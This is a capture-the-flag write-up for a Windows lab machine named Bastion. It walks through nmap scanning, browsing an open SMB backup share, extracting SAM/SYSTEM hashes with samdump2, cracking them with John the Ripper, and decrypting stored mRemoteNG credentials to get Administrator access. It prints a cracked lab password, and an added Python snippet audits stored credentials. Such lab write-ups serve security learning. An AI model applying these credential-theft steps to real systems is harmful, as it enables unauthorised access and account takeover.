$ nmap -sV -sC -p-
Nmap scan report for
Host is up (0.23s latency).
Not shown: 65522 closed ports
open ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
open msrpc        Microsoft Windows RPC
open netbios-ssn  Microsoft Windows netbios-ssn
open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc   Microsoft Windows RPC
49665/tcp open msrpc   Microsoft Windows RPC
49666/tcp open msrpc   Microsoft Windows RPC
49667/tcp open msrpc   Microsoft Windows RPC
49668/tcp open msrpc   Microsoft Windows RPC
49669/tcp open msrpc   Microsoft Windows RPC
49670/tcp open msrpc   Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE:
Host script results:
|_clock-skew: mean: -39m47s, deviation: 1h09m13s, median: 10s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-05-23T11:30:14+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_  Message signing enabled but not required
| smb2-time:
|   date: 2019-05-23 09:30:13
|_  start_date: 2019-05-23 05:46:29

Here we can see that SMB is open on the host.

So let's look at what shares SMB is offering:

$ smbclient -L

Here we get 4 shares. After enumerating them we found some sensitive files in the Backups share.

Under WindowsImageBackup we found a VHD file (a virtual hard disk).

We opened the VHD file on a Windows machine. To attach the VHD, follow these steps:

  1. Right-click on Computer/This PC and click Manage.
  2. Go to Disk Management and right-click on it.
  3. Select Attach VHD.
  4. Enter the location of the VHD and press Enter.

Location: \\\Backups\WindowsImageBackup\\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

Once the disk is attached, search it for the SAM and SYSTEM registry files.

They are found under C:\Windows\System32\Config.

We copied the SAM and SYSTEM files to our own system.

Then we used the samdump2 tool to extract the password hashes from them in a readable form:

$ samdump2 SAM SYSTEM > hash.txt 

The extracted hashes still have to be cracked, so we ran John the Ripper against them:

$ john --format=NT --wordlist=/usr/share/wordlist/rockyou.txt hash.txt

After cracking the hashes we recovered the plaintext password.

So here we have the credentials of the user L4mpje.

Logging in over SSH, we found user.txt.

After further enumeration we came across mRemoteNG.

mRemoteNG: mRemote stores connections for RDP, VNC, SSH, Telnet, rlogin and other protocols, and it saves their passwords in an encrypted format.

So this can be our key to escalating privileges to Administrator (root).

Here we found the mRemoteNG config files.

After this we installed the mRemoteNG application on our Windows machine.

Steps for privilege escalation
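As an added example (not part of the original writeup or of mRemoteNG itself), a small Python audit that parses a confcons.xml and lists which connections carry a stored, still encrypted, password; this is what an administrator would check on a jump host to see which credentials are sitting on disk. The element and attribute names (Node, Type, Username, Password, Hostname, Protocol, FullFileEncryption) are assumed from the mRemoteNG file format, and the sample file below is constructed with placeholder values.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of an mRemoteNG confCons.xml. Attribute
# names are assumed from the format; every value is a placeholder.
SAMPLE_CONFCONS = """<Connections Name="Connections" Export="false"
             EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
             FullFileEncryption="false" Protected="PLACEHOLDER_PROTECTED"
             ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
        Password="PLACEHOLDER_ENCRYPTED_BLOB_1" Hostname="127.0.0.1"
        Protocol="RDP" />
  <Node Name="Lab" Type="Container" Expanded="true">
    <Node Name="Workstation" Type="Connection" Username="L4mpje" Domain=""
          Password="PLACEHOLDER_ENCRYPTED_BLOB_2" Hostname="192.0.2.10"
          Protocol="RDP" />
  </Node>
  <Node Name="Jump" Type="Connection" Username="" Domain="" Password=""
        Hostname="192.0.2.20" Protocol="SSH2" />
</Connections>
"""


def stored_credentials(xml_text):
    """List every connection entry that carries a stored (encrypted) password.

    Returns one dict per entry with name, user, host and protocol, so an admin
    can see which credentials live on disk in this profile. Folders are
    Type="Container" nodes; iter() descends into them automatically."""
    root = ET.fromstring(xml_text)
    found = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue  # containers hold no credentials themselves
        if not node.get("Password", "").strip():
            continue  # nothing stored: the client prompts at connect time
        found.append({
            "name": node.get("Name", ""),
            "user": node.get("Username", ""),
            "host": node.get("Hostname", ""),
            "protocol": node.get("Protocol", ""),
        })
    return found


def full_file_encryption_enabled(xml_text):
    """True when the profile declares full-file encryption (assumed attribute
    name) rather than encrypting only the individual Password attributes."""
    root = ET.fromstring(xml_text)
    return root.get("FullFileEncryption", "false").lower() == "true"


if __name__ == "__main__":
    for e in stored_credentials(SAMPLE_CONFCONS):
        print(f"{e['name']}: {e['user']}@{e['host']} ({e['protocol']})")
    print("full-file encryption:", full_file_encryption_enabled(SAMPLE_CONFCONS))
```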

  1. Looking inside C:\Program Files\ we found an installed program, mRemoteNG.
  2. Searching for it turned up a known weakness in this program: the stored credentials can be disclosed.
  3. The file C:\Users\AppData\Roaming\mRemoteNG\confcons.xml holds the encrypted credentials; we copied the file to our system:
λ scp.exe L4mpje@\Users\L4mpje\AppData\Roaming\mRemoteng\confcons.xml .

  4. Installed mRemoteNG on our own system.
  5. In the top right corner click File > Open Connection File and select the copied confcons.xml file.
  6. Create a new external tool: click Tools in the top right corner, right-click External Tools and select New External Tool.
  7. In Display Name fill in any name you want, in Filename type cmd, and in Arguments type /k echo %password%
  8. Right-click on the connection DC and, under External Tools, select the one you created.
  9. A command prompt will pop up and show you the password for Administrator.
  10. Log in over SSH as Administrator:thXLHM96BeKL0ER2
